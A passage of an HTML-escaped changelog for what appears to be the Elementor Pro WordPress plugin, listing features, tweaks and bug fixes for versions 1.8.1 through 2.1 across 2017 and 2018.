widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3697\\\">#3697<\\/a>)<\\/li>\\n<li>Tweak: Added style options for Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1335\\\">#1335<\\/a>)<\\/li>\\n<li>Tweak: Added button CSS ID for Forms widget<\\/li>\\n<li>Tweak: Added pixel units to Post-Info divider height control<\\/li>\\n<li>Tweak: Rewrite sticky library to handle with stretch section, auto scroller & more bugs<\\/li>\\n<li>Tweak: Re-organize the panel categories per document type<\\/li>\\n<li>Tweak: Added ACF support for <code>options-page<\\/code> fields<\\/li>\\n<li>Tweak: Added dynamic tag for Animated headlines<\\/li>\\n<li>Tweak: Added dynamic tag for BlockQuote widget<\\/li>\\n<li>Fix: Elementor Full Width template in GeneratePress theme (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4817\\\">#4817<\\/a>)<\\/li>\\n<li>Fix: Checkbox fields can accidentally be set to required (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4324\\\">#4324<\\/a>)<\\/li>\\n<li>Fix: Initial slide in Carousel widget<\\/li>\\n<li>Fix: Stay on current slide while editing in Carousel widget<\\/li>\\n<li>Fix: Default slides per device in Carousel widget<\\/li>\\n<li>Deprecated: Woo Products, Woo Elements & Single elements widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.18 - 2018-07-27<\\/h4>\\n<ul>\\n<li>Fix: Global widget error on saving page<\\/li>\\n<\\/ul>\\n<h4>2.0.17 - 2018-07-26<\\/h4>\\n<ul>\\n<li>Fix: Sub menu indicator direction in Nav Menu widget<\\/li>\\n<li>Fix: Change the title and icon for Global Widget when is moving<\\/li>\\n<li>Fix: CSS wrapper selector for Page Document<\\/li>\\n<\\/ul>\\n<h4>2.0.16 - 2018-07-16<\\/h4>\\n<ul>\\n<li>Tweak: CSS Filter Control module is now included in Elementor<\\/li>\\n<li>Fix: Border gap in Portfolio widget when item gap set as <code>0<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5077\\\">#5077<\\/a>)<\\/li>\\n<li>Fix: Restore current query after get Global Widget data<\\/li>\\n<li>Fix: Add action item in History on unlink Global widget<\\/li>\\n<\\/ul>\\n<h4>2.0.15 - 2018-07-10<\\/h4>\\n<ul>\\n<li>Fix: Dropdown menu items collapsing when activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4996\\\">#4996<\\/a>)<\\/li>\\n<li>Fix: GMT offset in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4997\\\">#4997<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.0.14 - 2018-07-08<\\/h4>\\n<ul>\\n<li>Tweak: Added set method to form record for developers (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4983\\\">#4983<\\/a>)<\\/li>\\n<li>Fix: Autoplay option for Carousels<\\/li>\\n<li>Fix: Close mobile menu on item click in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.13 - 2018-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for Elementor v2.1<\\/li>\\n<\\/ul>\\n<h4>2.0.12 - 2018-07-02<\\/h4>\\n<ul>\\n<li>Fix: Global widget PHP notices<\\/li>\\n<li>Fix: Slides widget active slide lost focus when clicking Editor tabs<\\/li>\\n<li>Fix: Form select field send all selected values on multiple selection<\\/li>\\n<li>Fix: Validate time field only if it\'s not empty<\\/li>\\n<li>Fix: ConvertKit API not saving name field<\\/li>\\n<\\/ul>\\n<h4>2.0.11 - 2018-06-12<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder <code>author<\\/code> archive condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4593\\\">#4593<\\/a>)<\\/li>\\n<li>Fix: Respect password protected posts in Post Content widget<\\/li>\\n<li>Fix: Custom Fonts redirect to post edit screen in edge cases.<\\/li>\\n<\\/ul>\\n<h4>2.0.10 - 2018-06-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> filter hook for multi-language plugins<\\/li>\\n<li>Fix: Dynamic Post Terms missing taxonomies if the taxonomy is registered to more then one post types (#4386)<\\/li>\\n<li>Fix: Fields shortcode missing after removing a field in Form widget<\\/li>\\n<li>Deprecated: <code>get_theme_templates_by_location<\\/code> is replaced by <code>get_location_templates<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.0.9 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Fix: Compatibility for PHP version 5.4<\\/li>\\n<\\/ul>\\n<h4>2.0.8 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added Active state for Nav Menu dropdown<\\/li>\\n<li>Tweak: Added style for "Nothing Found" Message for Archive Posts widget<\\/li>\\n<li>Tweak: Removed caption control in Site Logo widget<\\/li>\\n<li>Tweak: Added option to position currency symbol before\\/after In Price Table widget<\\/li>\\n<li>Fix: Query control manual selection does not show more than 10 items (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4479\\\">#4479<\\/a>)<\\/li>\\n<li>Fix: Styling glitch with terms list in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4342\\\">#4342<\\/a>)<\\/li>\\n<li>Fix: Sub terms missing in Query control in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4527\\\">#4527<\\/a>)<\\/li>\\n<li>Fix: Avoid rendering a template if it\'s not published<\\/li>\\n<li>Fix: 404 Page style not working<\\/li>\\n<li>Fix: Price Table button with hover animation not working in editor<\\/li>\\n<li>Fix: Styling conflict in Call to Action widget<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Adding parent wrapper class to Site Title widget<\\/li>\\n<\\/ul>\\n<h4>2.0.7 - 2018-05-16<\\/h4>\\n<ul>\\n<li>Fix: Content not found on section when single is set to "All Singular"<\\/li>\\n<li>Fix: Open 404 template library for 404 page<\\/li>\\n<li>Tweak: Added CSS prefix for dev files<\\/li>\\n<li>Tweak: Removed product post type from display conditions<\\/li>\\n<\\/ul>\\n<h4>2.0.6 - 2018-05-15<\\/h4>\\n<ul>\\n<li>Tweak: Set type on create new single template<\\/li>\\n<li>Tweak: Always show the conditions dialog in the Draft status<\\/li>\\n<li>Tweak: Added document type <code>widget<\\/code><\\/li>\\n<li>Tweak: Added Post Custom Field tag to URL category<\\/li>\\n<li>Fix: When ACF Field Groups are Empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4428\\\">#4428<\\/a>)<\\/li>\\n<li>Fix: Links inside carousel in edge cases<\\/li>\\n<li>Fix: Responsive issue in My Templates area<\\/li>\\n<li>Fix: Image alignment for post content with text alignment<\\/li>\\n<li>Fix: Post Content widget when preview post is missing<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Style settings for Post \\/ Archive Title widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.5 - 2018-05-08<\\/h4>\\n<ul>\\n<li>Fix: Creating a CPT with name like document-type breaks the editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4203\\\">#4203<\\/a>)<\\/li>\\n<li>Fix: Added support for new version of reCAPTCHA<\\/li>\\n<li>Fix: Added fallback for controls after <code>post_status<\\/code><\\/li>\\n<li>Fix: Required field in forms widget<\\/li>\\n<li>Fix: Media Carousel in the Coverflow skin<\\/li>\\n<li>Fix: 404 Page show wrong template in edge cases<\\/li>\\n<li>Fix: Save the default menu in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.4 - 2018-05-02<\\/h4>\\n<ul>\\n<li>Tweak: Added parent\'s class for extended widgets<\\/li>\\n<li>Tweak: Set entire-site as default to avoid conflict with save without conditions<\\/li>\\n<li>Tweak: Initialize global model when it\'s needed<\\/li>\\n<li>Tweak: Removed some duplicate strings<\\/li>\\n<li>Tweak: Query control now includes empty terms<\\/li>\\n<li>Tweak: Design polish for conditions dialog<\\/li>\\n<li>Tweak: Decreasing <code>minimumInputLength<\\/code> to 1 of select2<\\/li>\\n<li>Fix: Editor not loading for single templates in edge cases<\\/li>\\n<li>Fix: Select2 in Safari takes it\'s time to get the original select width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4310\\\">#4310<\\/a>)<\\/li>\\n<li>Fix: Slides per view not working for some effects<\\/li>\\n<li>Fix: New slides not showing in the editor<\\/li>\\n<li>Fix: Editor for section without a defined location, defaults to content area<\\/li>\\n<\\/ul>\\n<h4>2.0.3 - 2018-04-24<\\/h4>\\n<ul>\\n<li>Tweak: Optimize CSS for Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4214\\\">#4214<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4216\\\">#4216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4225\\\">#4225<\\/a>)<\\/li>\\n<li>Fix: Double render on frontend view in core locations<\\/li>\\n<li>Fix: Masonry not working in edge cases<\\/li>\\n<li>Fix: Added default setting for Author Info tag<\\/li>\\n<\\/ul>\\n<h4>2.0.2 - 2018-04-18<\\/h4>\\n<ul>\\n<li>Fix: Regenerate conditions to include all templates<\\/li>\\n<\\/ul>\\n<h4>2.0.1 - 2018-04-17<\\/h4>\\n<ul>\\n<li>Tweak: Added div wrapper for Nothing Found massage (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4136\\\">#4136<\\/a>)<\\/li>\\n<li>Tweak: Show empty categories in Query Control & Display Conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4127\\\">#4127<\\/a>)<\\/li>\\n<li>Tweak: Added Divider control for Post Info widget<\\/li>\\n<li>Fix: Update admin links in Yoast Breadcrumbs widget<\\/li>\\n<li>Fix: Sticky element conflict with clearfix CSS<\\/li>\\n<li>Fix: Compatibility for PHP version 5.4.32 & 5.5.16 and below<\\/li>\\n<li>Fix: Avoid running <code>wp_head<\\/code> hooks twice<\\/li>\\n<\\/ul>\\n<h4>2.0.0 - 2018-04-16<\\/h4>\\n<ul>\\n<li>New: Introducing Theme Builder - <a href=\\\"https:\\/\\/elementor.com\\/introducing-theme-builder\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/417\\\">#417<\\/a>)<\\/li>\\n<li>New: Introducing Locations API to inject custom location templates<\\/li>\\n<li>New: Introducing Display Conditions for all dynamic templates<\\/li>\\n<li>New: Introducing Dynamic Tag feature - a new way to add dynamic content to your design<\\/li>\\n<li>New: Introducing Role manager to allow "Content Only mode" (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/483\\\">#483<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/653\\\">#653<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/885\\\">#885<\\/a>)<\\/li>\\n<li>New: Introducing 9 new dynamic widgets: Archive Posts, Archive Title, Post Content, Post Info, Post Title, Post Excerpt, Featured Image, Site Logo & Site Name (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Introducing Developers area with guides and API documentation - <a href=\\\"https:\\/\\/elementor.com\\/introducing-elementor-developer-api\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/451\\\">#451<\\/a>)<\\/li>\\n<li>New: Introducing <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor-hello-theme\\\">Elementor Hello Theme<\\/a> - A demonstration theme for developers<\\/li>\\n<li>New: Added new type of templates: Header, Footer, Single and Archive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2761\\\">#2761<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2623\\\">#2623<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2109\\\">#2109<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2061\\\">#2061<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2439\\\">#2439<\\/a>)<\\/li>\\n<li>New: Design 404 page with Single template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1558\\\">#1558<\\/a>)<\\/li>\\n<li>New: Design Search Results with Archive template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3196\\\">#3196<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2590\\\">#2590<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect for sections including <em>Sticky Element<\\/em> per device (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2412\\\">#2412<\\/a>)<\\/li>\\n<li>New: Integration with Custom Fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2054\\\">#2054<\\/a>)<\\/li>\\n<li>New: Partial support for Toolset integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Partial support for Pods integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2169\\\">#2169<\\/a>)<\\/li>\\n<li>New: Partial support for ACF integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2041\\\">#2041<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2059\\\">#2059<\\/a>)<\\/li>\\n<li>Tweak: Add custom fields support for ActiveCampaign (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3531\\\">#3531<\\/a>)<\\/li>\\n<li>Tweak: Allow brackets in Forms Tel field<\\/li>\\n<li>Tweak: Added currency format control for Price Table widget<\\/li>\\n<li>Tweak: Reduced API request for some servers<\\/li>\\n<li>Fix: Dropdown <code>border-radius<\\/code> in Nav Menu widget<\\/li>\\n<li>Fix: Price List widget layout breaks in edge cases<\\/li>\\n<li>Note: This version requires Elementor v2.0.6<\\/li>\\n<\\/ul>\\n<h4>1.15.6 - 2018-03-28<\\/h4>\\n<ul>\\n<li>Fix: Removed duplicate Custom CSS section (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3938\\\">#3938<\\/a>)<\\/li>\\n<li>Fix: <code>box-shadow<\\/code> issue with cards skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3940\\\">#3940<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.5 - 2018-03-27<\\/h4>\\n<ul>\\n<li>Fix: Added global widget compatibility for Elementor v2.0<\\/li>\\n<li>Fix: Reduced API request for some servers<\\/li>\\n<\\/ul>\\n<h4>1.15.4 - 2018-03-26<\\/h4>\\n<ul>\\n<li>Tweak: Allow brackets in phone field<\\/li>\\n<li>Tweak: Added compatibility with Yoast 7.0.+<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Support for multiple carousel setting in editor<\\/li>\\n<li>Fix: <code>on_export<\\/code> issue in forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3890\\\">#3890<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.3 - 2018-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Added unique class to field group div (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3595\\\">#3595<\\/a>)<\\/li>\\n<li>Fix: Screen Options missing when Pro is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3622\\\">#3622<\\/a>)<\\/li>\\n<li>Fix: Allow label styling even when <code>show labels<\\/code> is set hide (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3544\\\">#3544<\\/a>)<\\/li>\\n<li>Fix: Typography control not working in edge cases<\\/li>\\n<li>Fix: Safari compatibility for Search widget<\\/li>\\n<\\/ul>\\n<h4>1.15.2 - 2018-02-27<\\/h4>\\n<ul>\\n<li>Fix: Only add support mine-type if needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3543\\\">#3543<\\/a>)<\\/li>\\n<li>Fix: Better support for Old Typekit kits<\\/li>\\n<\\/ul>\\n<h4>1.15.1 - 2018-02-21<\\/h4>\\n<ul>\\n<li>Tweak: Custom font title placeholder is not <code>enter font family<\\/code><\\/li>\\n<li>Tweak: Custom font title set as required<\\/li>\\n<li>Fix: Custom font, <code>font-face<\\/code> enqueued only once if used in global (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3513\\\">#3513<\\/a>)<\\/li>\\n<li>Fix: Added workaround for upload validation which relies on a PHP extension (fileinfo) with inconsistent reporting behavior.<\\/li>\\n<\\/ul>\\n<h4>1.15.0 - 2018-02-19<\\/h4>\\n<ul>\\n<li>New: Added custom fonts manager for self hosted fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/852\\\">#852<\\/a>)<\\/li>\\n<li>New: Integration with Adobe TypeKit fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/631\\\">#631<\\/a>)<\\/li>\\n<li>Tweak: Clear menu from Nav Menu widget on template export<\\/li>\\n<li>Tweak: Allow zero for GetResponse integration as <code>day of cycle<\\/code><\\/li>\\n<\\/ul>\\n<h4>1.14.2 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Fix: Global widget content that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.14.1 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>none<\\/code> option to content animation in CTA widget<\\/li>\\n<li>Tweak: Added <code>form_id<\\/code> to ActiveCampaign integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3422\\\">#3422<\\/a>)<\\/li>\\n<li>Fix: Page crashed when Global widget not found.<\\/li>\\n<\\/ul>\\n<h4>1.14.0 - 2018-02-12<\\/h4>\\n<ul>\\n<li>New: Added Call to Action widget<\\/li>\\n<li>Tweak: MailPoet pull field mapping from MailPoet instead of hardcoded<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Allow zero (0) to be accepted as a field value<\\/li>\\n<li>Fix: Login form when custom login URL is set<\\/li>\\n<li>Fix: Added Day of cycle control to GetResponse integration<\\/li>\\n<\\/ul>\\n<h4>1.13.2 - 2018-01-23<\\/h4>\\n<ul>\\n<li>Tweak: Added placeholder to Password field<\\/li>\\n<li>Tweak: Removed <code>subscriber_already_exists_message<\\/code> control to prevent potential data leakage<\\/li>\\n<li>Fix: MailPoet Subscriber Already Exists error validation against translated string directly from MailPoet<\\/li>\\n<li>Fix: Changed <code>imagesLoaded()<\\/code> to Vanilla JS to avoid compatibility issues with some themes<\\/li>\\n<li>Fix: Only validate Tel field if not empty<\\/li>\\n<li>Fix: Stop slider while editing<\\/li>\\n<\\/ul>\\n<h4>1.13.1 - 2018-01-16<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with old PHP versions<\\/li>\\n<\\/ul>\\n<h4>1.13.0 - 2018-01-16<\\/h4>\\n<ul>\\n<li>New: Added File Upload field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1482\\\">#1482<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Acceptance field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1693\\\">#1693<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Date field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1868\\\">#1868<\\/a>)<\\/li>\\n<li>New: Added Time field for Forms widget<\\/li>\\n<li>New: Added Password field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2164\\\">#2164<\\/a>)<\\/li>\\n<li>New: Added HTML field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1500\\\">#1500<\\/a>)<\\/li>\\n<li>Tweak: Added characters validation for Tel field<\\/li>\\n<li>Tweak: Added min & max validation for Number field<\\/li>\\n<li>Tweak: Added multiple selection for Select field<\\/li>\\n<li>Tweak: Added donReach integration for Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.12.3 - 2018-01-09<\\/h4>\\n<ul>\\n<li>Fix: Render element plain content instead of parsed content when not needed in global widget<\\/li>\\n<li>Fix: Apply <code>url-encoding<\\/code> to "Tweet" button text in Blockquote widget to prevent unexpected corruption of the tweet text<\\/li>\\n<li>Fix: Removed My Account link from dashboard widget<\\/li>\\n<\\/ul>\\n<h4>1.12.2 - 2018-01-03<\\/h4>\\n<ul>\\n<li>Tweak: Added animation none for Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2964\\\">#2964<\\/a>)<\\/li>\\n<li>Fix: Active license button style<\\/li>\\n<\\/ul>\\n<h4>1.12.1 - 2018-01-02<\\/h4>\\n<ul>\\n<li>Tweak: Removed theme-element widgets from plain content<\\/li>\\n<li>Tweak: Set all theme-element widgets to extend same widget Base<\\/li>\\n<li>Tweak: Removed credit URL in forms meta data<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.9<\\/li>\\n<li>Fix: Validate Get response Error as real error<\\/li>\\n<li>Fix: Removed responsive height control from Facebook Page widget<\\/li>\\n<\\/ul>\\n<h4>1.12.0 - 2017-12-20<\\/h4>\\n<ul>\\n<li>New: Added Drip integration to Forms<\\/li>\\n<li>New: Added ActiveCampaign integration to Forms<\\/li>\\n<li>New: Added ConverKit integration to Forms<\\/li>\\n<li>New: Added GetResponse integration to Forms<\\/li>\\n<li>New: Added form <code>id<\\/code>, <code>name<\\/code> attributes to handle integration with auto collectors like HubSpot<\\/li>\\n<li>New: Added Global API key for MailChimp to improve the workflow<\\/li>\\n<li>Tweak: Better error handling and message display for Forms<\\/li>\\n<li>Fix: PHP notice Undefined variable <code>$cc_header<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2934\\\">#2934<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.11.0 - 2017-12-11<\\/h4>\\n<ul>\\n<li>New: Added a native Comments widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Added an Author Box widget<\\/li>\\n<li>New: Added a Post Navigation widget<\\/li>\\n<li>New: Added a Yoast Breadcrumbs widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2749\\\">#2749<\\/a>)<\\/li>\\n<li>Tweak: Added a close button to search widget under Full Screen skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2762\\\">#2762<\\/a>)<\\/li>\\n<li>Fix: Allow currency symbol to appear even if price isn\'t numeric<\\/li>\\n<li>Fix: Edge cases when the nav menu is empty in a stretched section<\\/li>\\n<li>Fix: Added fallback when you remove the <code>space-between<\\/code> on Swiper carousel<\\/li>\\n<\\/ul>\\n<h4>1.10.2 - 2017-12-03<\\/h4>\\n<ul>\\n<li>Fix: Missing save widget icon (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2878\\\">#2878<\\/a>)<\\/li>\\n<li>Fix: Global widgets not saving edits (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2874\\\">#2874<\\/a>)<\\/li>\\n<li>Fix: Removed <code>white-space: nowrap;<\\/code> property from vertical menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2815\\\">#2815<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.10.1 - 2017-11-30<\\/h4>\\n<ul>\\n<li>Tweak: Added default value for search form<\\/li>\\n<li>Tweak: Order template list A-Z in the library widget<\\/li>\\n<li>Tweak: get_users\\/authors query is now done using AJAX only, for better performance in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2865\\\">#2865<\\/a>)<\\/li>\\n<li>Fix: When adding <code>.00<\\/code> it is not displayed on the front<\\/li>\\n<li>Fix: Make sure space between is numeric for carousel control<\\/li>\\n<li>Fix: Added space for radio & checkbox fields in form widget<\\/li>\\n<\\/ul>\\n<h4>1.10.0 - 2017-11-15<\\/h4>\\n<ul>\\n<li>New: Added native Search form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2576\\\">#2576<\\/a>)<\\/li>\\n<li>Tweak: Added Slides To Scroll & Loop controls to Media Carousel and Testimonials widgets<\\/li>\\n<li>Tweak: Added Inline editing to Blockquote widget<\\/li>\\n<li>Fix: Animated Headline color bug (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2516\\\">#2516<\\/a>)<\\/li>\\n<li>Fix: Animated Headline with Rotating skin<\\/li>\\n<li>Fix: RTL fix for Animated Headline widget in \'typing\' and \'clip\' animations<\\/li>\\n<li>Fix: Empty menu cause jQuery to crash in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2662\\\">#2662<\\/a>)<\\/li>\\n<li>Fix: Custom CSS gone after reloading the editor<\\/li>\\n<\\/ul>\\n<h4>1.9.5 - 2017-10-27<\\/h4>\\n<ul>\\n<li>Fix: Broken Global widget with JS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2639\\\">#2639<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.9.4 - 2017-10-24<\\/h4>\\n<ul>\\n<li>Tweak: Improved UI for notices and license page<\\/li>\\n<li>Fix: Update system conflict with other EDD plugins<\\/li>\\n<li>Fix: WooCommerce frontend hooks on Elementor editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2577\\\">#2577<\\/a>)<\\/li>\\n<li>Fix: Removed default border left in Nav Menu dropdown CSS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2496\\\">#2496<\\/a>)<\\/li>\\n<li>Fix: Increased submenu max-width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2558\\\">#2558<\\/a>)<\\/li>\\n<li>Fix: Save global templates without their defaults<\\/li>\\n<li>Fix: Horizontal scrolling issue with posts grid<\\/li>\\n<\\/ul>\\n<h4>1.9.3 - 2017-10-03<\\/h4>\\n<ul>\\n<li>Fix: Condition slide style that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.9.2 - 2017-10-02<\\/h4>\\n<ul>\\n<li>New: Added integration with MailPoet 3 for Forms actions<\\/li>\\n<li>Fix: Removed height control from Testimonial carousel in mobile editing mode<\\/li>\\n<li>Fix: Removed bottom padding when there\'s no pagination in Testimonial carousel<\\/li>\\n<li>Fix: Added condition for slides style section in skin bubble mode<\\/li>\\n<li>Fix: Slides per view control for mobile editing in Testimonial carousel<\\/li>\\n<li>Fix: Navigation Arrows icons matched with common Elementor Navigation Arrows<\\/li>\\n<\\/ul>\\n<h4>1.9.1 - 2017-09-28<\\/h4>\\n<ul>\\n<li>Fix: Slides per view for slideshow carousel<\\/li>\\n<li>Fix: Final polish for the new Testimonial Carousel widget<\\/li>\\n<li>Fix: Don\'t play video if slide type is not video<\\/li>\\n<li>Fix: Removed slides style section condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2497\\\">#2497<\\/a>)<\\/li>\\n<li>Fix: Set cursor as pointer for slideshow thumbnails<\\/li>\\n<\\/ul>\\n<h4>1.9.0 - 2017-09-26<\\/h4>\\n<ul>\\n<li>New: Added Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/216\\\">#216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/347\\\">#347<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2209\\\">#2209<\\/a>)<\\/li>\\n<li>New: Added Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/715\\\">#715<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.3 - 2017-09-24<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility for WordPress 4.8.2 & 4.7.6<\\/li>\\n<li>Fix: Remove slashes from Form sent data<\\/li>\\n<\\/ul>\\n<h4>1.8.2 - 2017-09-19<\\/h4>\\n<ul>\\n<li>Tweak: Added target URL for the tweet message in Blockquote widget<\\/li>\\n<li>Tweak: Render the slide height before the slider is finished loading<\\/li>\\n<li>Fix: Space between words for Animated Headline widget<\\/li>\\n<li>Fix: RTL compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Italic font style for Animated Headline widget<\\/li>\\n<li>Fix: Excluded Menu widget from the WP Editor text rendering<\\/li>\\n<\\/ul>\\n<h4>1.8.1 - 2017-09-18<\\/h4>\\n<ul>\\n<li>Fix: WCAG Compatible "required" field attribute for W3C validation (<a 